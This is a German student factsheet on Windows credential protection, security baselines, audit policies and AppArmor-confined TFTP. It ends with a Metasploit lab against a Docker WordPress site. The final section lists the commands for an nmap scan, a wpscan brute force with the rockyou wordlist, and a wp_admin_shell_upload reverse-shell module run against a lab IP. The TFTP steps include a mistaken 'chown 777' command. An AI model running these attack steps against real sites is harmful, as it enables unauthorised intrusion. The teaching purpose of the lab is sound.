

B3 - Factsheet

Autoren: Lukas Freudensprung, Abd Sattaar Matitu, Sebastian Trostmann, Morris Tichy

Inhaltsverzeichnis

1.	Credentials Protection	. 3
	1.1. Protected Users Group	. 3
	1.1.1. Was ist die Protected Users Group?	. 3
	1.2. Checkliste Protected Users Group	. 3
	1.3. Credetial Guard	. 4
	1.3.1. Was ist der Credential Guard?	. 4
	1.4. Checkliste Credential Guard	. 4
2.	Windows Security Baseline	. 5
	2.1. Was ist die Windows Security Baseline?	. 5
	2.2. Checkliste Windows Security Baseline	. 5
3.	Advanced Security Audit Policies	. 6
	3.1. Theorie	. 6
	3.1.1. Was sind Advanced Security Audit Policies?	. 6
	3.1.2. Vorteile	. 6
	3.2. Checkliste	. 6
4.	AppArmor	. 7
	4.1. Theorie	. 7
	4.1.1. TFTP	. 7
	4.1.2. AppArmor	. 7
	4.2. Checkliste	. 8
	4.2.1. TFTP	. 8
	4.2.2. AppArmor	. 8
	4.3. Befehlsreferenz	. 8
	4.3.1. TFTP	. 8
	4.3.2. AppArmor	. 9
5.	Metasploit Framework	10
	5.1. Theorie	10
	5.1.1. Docker Compose	10
	5.1.2. Wordpress	10
	5.1.3. Metasploit	10



	5.1.3.1. Nmap	11
5.2.	Checkliste	11
	5.2.1. Wordpress	11
	5.2.2. Metasploit	11
	5.2.3. Passwort Attacke	11
5.3.	Befehlsreferenz	11
	5.3.1. docker-compose.yml	12
	5.3.2. Reversed-Shell	



1. Credentials Protection

1.1. Protected Users Group

1.1.1. Was ist die Protected Users Group?

Die Protected-Users-Group ist eine globale Sicherheistruppe für das AD, um sich vor Credential-Diebstahl schützen zu können. Die Gruppe triggered Schutzmaßnahmen welche nicht explizit konfiguriert wurden, damit Credential Caching verhindert werden kann.

Vorraussetzungen

- Windows Client läuft auf Windows 8.1 oder später
- Windows Server 2012 R2 oder später
- Domain Functional Level muss Windows Server 2012 R2 oder später sein
- Protected Global Security Group Memberships bregenzen Admins nur AES für Kerberos zu verwenden. Demnach müssen Mitglieder in der Lage sein, sich mit AES authentifizieren zu können.

User kann man entweder mittels UI-Tools wie dem Admin-Center, Active Directory Users und Computers oder durch Powershell-Commandos hinzufügen.

Enterprise-Admins und Domain-Admins sollten nicht zur Protected-Users-Group gehören. Service- und Computer-Accounts ebenfalls nicht in die Protected-Users-Group hinzufügen. Es würde sich nicht auszahlen, da Passwörter am lokalen Host immer verfügbar sind.

1.2. Checkliste Protected Users Group

	Vorraussetzungen wie oben beschrieben erfüllt. Powershell öffnen	
Fo	lgenden Command ausführen:	
1	Get-ADGroup -Identity "Protected Users" Add-ADGroupMember - Members "CN=Adam, CN=Users, DC=corp, DC=example, DC=com"	powershell

Version vom 05.03.2025 3 / 13



1.3. Credetial Guard

1.3.1. Was ist der Credential Guard?

Der Credential Guard ist eine Sicherheitsfunktion in Windows 10 und Windows Server 2016, die dazu dient, Anmeldeinformationen zu schützen. Der Credential Guard verwendet virtualisierungsbasierte Sicherheit, um Anmeldeinformationen zu schützen, indem sie in einem geschützten Bereich des Systems gespeichert werden.

Vorraussetzungen für Win 11, 22H2 oder später
☐ Lizenzanforderungen wurden erfüllt
☐ Hard- und Softwareanforderungen wurden erfüllt
☐ Credential Guard wurde nicht explizit deaktiviert
Vorraussetzungen für Windows Server
☐ Die Lizensierunganforderungen wurden erfüllt
☐ Die Hard- und Software Anforderungen wurden erfüllt
☐ Credential Guard wurde explizit nicht deaktiviert
☐ Teil einer Domäne
☐ Kein Domain Controller
Featureanforderungen damit der Credential Guard funktioniert:
☐ Virtualized-based Security (VBS)
☐ Secure Boot
Optionale features wären:
■ Trusted Platform Module (TPM)
■ UEFI lock
1.4. Checkliste Credential Guard
1.4. Checkliste Credential Guard
☐ Vorraussetzungen wie oben beschrieben erfüllt
Secure Boot aktiviert
☐ Group Policy Management öffnen
☐ Neue Gruppenrichtlinie erstellen
☐ Zu folgendem Pfad navigieren: Computer Configuration -> Administrative Templates ->
System -> Device Guard -> Turn on Virtualization Based Security
Gruppenrichtlinie aktivieren
gpupdate /force in der Powershell ausführen
☐ Überprüfung durch Systeminformationen

Version vom 05.03.2025 4 / 13



2. Windows Security Baseline

2.1. Was ist die Windows Security Baseline?

Eine Security-Baseline ist eine Gruppe von von Microsoft empfohlenen Konfigurationseinstellungen, die deren Auswirkungen auf die Sicherheit erläutern. Diese Einstellungen basieren auf Feedback von Microsoft-Security-Entwicklungsteams, -Produktgruppen, -Partnern und - Kunden.

Policy Analyzer

Der PolicyAnalyzer ist ein Microsoft-Tool, das Administratoren hilft, Gruppenrichtlinien objektiv zu analysieren und zu vergleichen. Es wird oft in Verbindung mit den Windows Security Baselines genutzt, um Sicherheitsrichtlinien zu überprüfen und sicherzustellen, dass sie den empfohlenen Best Practices entsprechen. Der Policy-Analyzer kann verschiedene GPOs (Group Policy Objects) auswerten. Abweichungen zwischen ihnen aufzeigen und mit den vordefinierten Compliance-Vorgaben der Security-Baselines abgleichen. Dies erleichtert es Unternehmen, ihre Systeme auf Sicherheitslücken zu prüfen, Richtlinien zentral zu verwalten und sicherzustellen, dass alle Geräte den vorgeschriebenen Sicherheitsstandards entsprechen.

2.2. Checkliste Windows Security Baseline

\square V	Vindows Security Compliance Toolkit heruntergeladen
□ P	Olicy Analyzer ausgeführt
\square B	Baseline im Policy Anazyler hinzugefügt
\Box S	ecurity Baseline per GPOs bereitstellen
\Box G	Group Policy Management öffnen
\square N	Neue Gruppenrichtlinie erstellen
□ P	fad auf dem die Baseline liegt importieren
\Box G	GPO-Status aktivieren
□ A	Auf geforderte OUs anbinden

Version vom 05.03.2025 5 / 13



3. Advanced Security Audit Policies

3.1. Theorie

3.1.1. Was sind Advanced Security Audit Policies?

Die Advanced Security Audit Policies ermöglichen eine detaillierte Kontrolle über sicherheitsrelevante Ereignisse im Netzwerk. Sie erweitern die klassischen Audit Policies und bieten granulare Einstellungsmöglichkeiten zur Überwachung sicherheitskritischer Prozesse.

3.1.2. Vorteile

- Verbesserte Transparenz und Nachvollziehbarkeit von sicherheitsrelevanten Ereignissen
- Frühe Erkennung von Sicherheitsvorfällen
- Einhaltung von Compliance-Vorgaben
- Präzisere Kontrolle durch detaillierte Audit-Kategorien

3.2. Checkliste

Group Policy Management Console öffnen
Neue Gruppenrichtlinie erstellen
Zu folgendem Pfad navigieren:
$Computer\ Configuration \backslash Windows\ Settings \backslash Security\ Settings \backslash Advanced\ Audit\ Policy\ Configuration \rangle \\$
figuration\System Audit Policies
Beliebige Kategorien aktivieren, zum Beispiel:
Account Management -> Audit User Account Management
Logon/Logoff -> Audit Kerberos Authentication Service
Account Management -> Audit Security Group Management
DS Access -> Audit Directory Service Changes
Gruppenrichtlinie mit OU verknüpfen
Überprüfung durch Event Viewer (Windows Logs -> Security)

Version vom 05.03.2025 6 / 13



4. AppArmor

4.1. Theorie

4.1.1. TFTP

TFTP (Trivial File Transfer Protocol) ist ein einfaches Protokoll zum Übertragen von Dateien über ein Netzwerk. Es wird häufig in Umgebungen eingesetzt, in denen geringe Ressourcenanforderungen wichtig sind, wie beispielsweise beim Booten von Thin Clients oder Netzwerkgeräten. TFTP verwendet das UDP-Protokoll und bietet im Vergleich zu FTP weniger Funktionen, was es jedoch leichter und schneller macht.

tftp-hpa ist eine erweiterte Version des BSD TFTP-Clients und -Servers, entwickelt von H. Peter Anvin. Diese Implementierung enthält zahlreiche Fehlerbehebungen und Verbesserungen gegenüber dem Original und ist auf den meisten modernen Unix-Varianten lauffähig. Es ist wichtig zu beachten, dass tftp-hpa in der Vergangenheit Sicherheitslücken aufwies, wie beispielsweise einen Pufferüberlauf, der es Angreifern ermöglichte, beliebigen Code auszuführen. Diese Schwachstelle wurde jedoch behoben, und es wird empfohlen, stets die neueste Version zu verwenden, um Sicherheitsrisiken zu minimieren.

4.1.2. AppArmor

AppArmor (Application Armor) ist ein Sicherheitsmodul des Linux-Kernels, das es Systemadministratoren ermöglicht, die Fähigkeiten von Programmen durch spezifische Profile einzuschränken. Diese Profile können Berechtigungen wie Netzwerkzugriff, Zugriff auf Raw-Sockets sowie Lese-, Schreib- oder Ausführungsrechte für bestimmte Pfade definieren. AppArmor ergänzt das traditionelle Unix-Discretionary-Access-Control-Modell (DAC) durch die Bereitstellung von Mandatory Access Control (MAC). Seit der Kernel-Version 2.6.36 ist AppArmor teilweise im Hauptzweig des Linux-Kernels enthalten, und seine Entwicklung wird seit 2009 von Canonical unterstützt.

Ein herausragendes Merkmal von AppArmor ist der Lernmodus, in dem Profilverletzungen protokolliert, aber nicht verhindert werden. Dies ermöglicht Administratoren, Profile basierend auf dem typischen Verhalten eines Programms zu erstellen, ohne den laufenden Betrieb zu beeinträchtigen. Befürworter von AppArmor betonen, dass es weniger komplex und für den durchschnittlichen Benutzer leichter zu erlernen ist als beispielsweise SELinux. Zudem erfordert AppArmor weniger Anpassungen an bestehenden Systemen, da es dateisystemunabhängig arbeitet und keine speziellen Anforderungen an das Dateisystem stellt.

Version vom 05.03.2025 7 / 13



4.2. Checkliste

4	\mathbf{a}	1.	T	T	т	n
4	•			н		1
ъ.		1.				

 □ tftpd-hpa und tftp-hpa installieren, starten und enablen □ Log-Datei konfigurieren □ Ordner für TFTP-Dateien erstellen und Berechtigungen setzen □ Firewall-Regeln für TFTP konfigurieren
☐ TFTP-Server testen mit tftp, get und put
4.2.2. AppArmor
☐ AppArmor(-utils) installieren und starten
☐ AppArmor-Profile für Programme erstellen und aktivieren
☐ Programme testen und Verletzungen überwachen
☐ Profile scannen und Berechtigungen anpassen
$\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ $
■ Falls nötig: Finetuning in /etc/apparmor.d/usr.sbin.in.tftpd am Profil durchführen.

4.3. Befehlsreferenz

4.3.1. TFTP

Command	Erklärung	
sudo apt install tftpd-hpa	tftp server installieren	
sudo apt install tftp-hpa	tftp client installieren	
sudo systemctl start tftpd-hpa	tftp server starten	
sudo systemctl enable tftpd-hpa	tftp server automatisch beim hochfahren starten	
<pre>1 sudo nano /etc/default/tftpd-hpa bash 2 TFTP_USERNAME="tftp" 3 TFTP_DIRECTORY="/srv/tftp" 4 TFTP_ADDRESS="0.0.0.0:69"</pre>	Konfigurationsdatei des TFTP Servers -> Hier kann die Log- Datei hinzugefügt werden, falls nötig	
5 TFTP_OPTIONS="securecreate"	0	

Version vom 05.03.2025 8 / 13



Command	Erklärung	
cd /srv/tftp	Ordner in dem die Dateien liegen, die vom TFTP-Server bereitgestellt werden.	
chown 777 /srv/tftp	Berechtigungen setzen	
sudo nano test.txt	Testfile erstellen	
tftp IP-ADRESSE	Auf den TFTP-Server zugreifen	
help	in TFTP um die Optionen zu sehen	
get test.txt	test.txt herunterladen	
q	aus tftp herauskommen	

4.3.2. AppArmor

Command	Erklärung
sudo apt install apparmor apparmor-utils	apparmor installieren
apparmor_status	Zeigt aktuellen Status sowie jeweilige Betriebsart
aa-enforce	Wechselt bei einem Profil in den enforce-Modus (setzt das geladene Profil um)
aa-complain	Wechselt ein Profil in den complain-Modus, in dem er nur protokolliert
aa-teardown	Beendet und entlädt vollständig alle Profile
aa-status	Zeigt nochmals alle Profile usw an

Version vom 05.03.2025 9 / 13



Command	Erklärung
aa-unconfined	Zeigt alle noch nicht durch AppArmor gesicherten Services an
sudo aa-genprof in.tftpd	Erstellt ein eigenes Profil für den TFTP-Server und aktiviert es nach Konfiguration
sudo aa-logprof in.tftpd	Aktualisiert das Profil anhand der im Syslog protokollierten Berechtigungsanfragen

5. Metasploit Framework

5.1. Theorie

5.1.1. Docker Compose

Mit Docker Compose können mehrere Container in einer einzigen Datei definiert werden, ebenso wie ihre gegenseitigen Beziehungen. Alle Container können dann mit nur einem einzigen Befehl gestartet werden. Dies erweist sich als besonders praktisch, da die Datei geteilt werden kann, um eine einheitliche Serverumgebung sicherzustellen.

5.1.2. Wordpress

Wordpress ist eine Open-Source-Managment-System, dass dem Nutzer auf einer einfache Weise ermöglicht wichtige Aspetke einer Website - wie zum Beispiel: Design - zu verwalten. Jede rund jede vierte Website wird durch Wordpress gehostet, da es sehr beliebt ist und wenig technisches Wissen erfordert.

5.1.3. Metasploit

Das Metasploit-Projekt ist ein Projekt zur Computersicherheit, das Informationen über Sicherheitslücken bietet und bei Penetrationstests sowie der Entwicklung von IDS-Signaturen eingesetzt werden kann. Das bekannteste Teilprojekt ist das freie Metasploit Framework, ein Werkzeug zur Entwicklung und Ausführung von Exploits gegen verteilte Zielrechner. Andere wichtige Teilprojekte sind das Shellcode-Archiv und Forschung im Bereich der IT-Sicherheit.

Version vom 05.03.2025 10 / 13



5.1.3.1. Nmap

Nmap ist ein freier Portscan der verwendet wird um Informationen über das Zielsystem herauszufinden. Das Programm schaut nach offenen Ports im Netzwerk und ist beliebt um die Netzwerksicherheit zu gewährleisten.

5.2. Checkliste

5.2.1. Wordpress			
	Installation von Docker-Compose Erstellung von Wordpress Projekt Erstellung von YAML Datei Start des Projektes Grundkonfiguration von Wordpress		
5.2	2.2. Metasploit		
	Installation von Database Server Starten von Metasploit Durchführung von Nmap Scan		
5.2	2.3. Passwort Attacke		
	Durchführung von wpscan Auslesen von User & Passwort Starten einer Reversed-Shell Ausführung von Befehlen auf Metasploit		

5.3. Befehlsreferenz

Command	Erklärung
sudo apt-get install docker-compose-plugin	Installation von Docker- Compose
sudo snap install docker	Installation von Docker
cd my_wordpress	Erstellung vom Projekt

Version vom 05.03.2025 11 / 13



Command	Erklärung
siehe YAML (Kapitel 5.3.1)	Erstellung von YAML Datei
docker-compose up -d	Starten von dem Service
sudo systemctl start postgresql	Installation von Database Server
sudo systemctl start postgresql	Installation von Database Server
msfconsole	Starten von Metasploit
db_nmap -v -sV 192.168.181.167	Durchführung von Map Scan
hosts	Erkannte Hosts anzeigen
<pre>wpscanurl http://192.168.181.167 -U users.txt -P /usr/share/wordlists/ rockyou.txt</pre>	Durchführung von wpscan
Reversed-Shell Ausführung (Kapitel 5.3.2)	Reversed-Shell Ausführung

5.3.1. docker-compose.yml

In dem nachfolgenden Codeblock steht die Konfiguration der docker-compose.yml Datei.

```
services:
     db:
       # We use a mariadb image which supports both amd64 & arm64
   architecture
       image: mariadb:10.6.4-focal
       # If you really want to use MySQL, uncomment the following line
       #image: mysql:8.0.27
       command: '--default-authentication-plugin=mysql_native_password'
       volumes:
9
         db data:/var/lib/mysql
      restart: always
10
11
       environment:
         - MYSQL_ROOT_PASSWORD=somewordpress
         - MYSQL_DATABASE=wordpress
13
         - MYSQL USER=wordpress
         - MYSQL PASSWORD=wordpress
15
16
       expose:
         - 3306
17
         - 33060
18
19
     wordpress:
       image: wordpress:latest
```

Version vom 05.03.2025 12 / 13



```
21
       volumes:
         wp data:/var/www/html
23
       ports:
24
         - 80:80
       restart: always
26
       environment:
27
         - WORDPRESS DB HOST=db
         - WORDPRESS DB USER=wordpress
28
         - WORDPRESS_DB_PASSWORD=wordpress
29
         - WORDPRESS DB NAME=wordpress
30
31 volumes:
32
     db_data:
33
     wp_data:
```

5.3.2. Reversed-Shell

In dem nachfolgenden Codeblock steht die Konfiguration der Reversed-Shell

```
1 use exploit/unix/webapp/wp_admin_shell_upload
2 set RHOSTS 192.168.181.167 # Ziel-IP des WordPress-Servers
3 set TARGETURI / # WordPress läuft direkt im Root-Verzeichnis
4 set USERNAME Morris # Administrator-Benutzername
5 set PASSWORD Ganzgeheim123! # Administrator-Passwort
6 exploit
```

Version vom 05.03.2025 13 / 13